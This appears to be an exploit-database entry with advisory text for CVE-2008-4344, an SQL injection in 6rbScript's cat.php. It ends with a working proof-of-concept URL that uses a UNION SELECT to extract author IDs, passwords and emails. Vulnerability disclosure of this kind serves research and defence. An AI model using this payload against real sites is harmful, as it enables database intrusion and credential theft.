[] NeoSense

6rbScript - 'cat.php' SQL Injection

Author: Karar Alshami
type: webapps
platform: php
port: 
date_added: 2008-09-22 
date_updated: 2014-03-21 
verified: 1 
codes: CVE-2008-4344;OSVDB-48673 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/31329/info

6rbScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--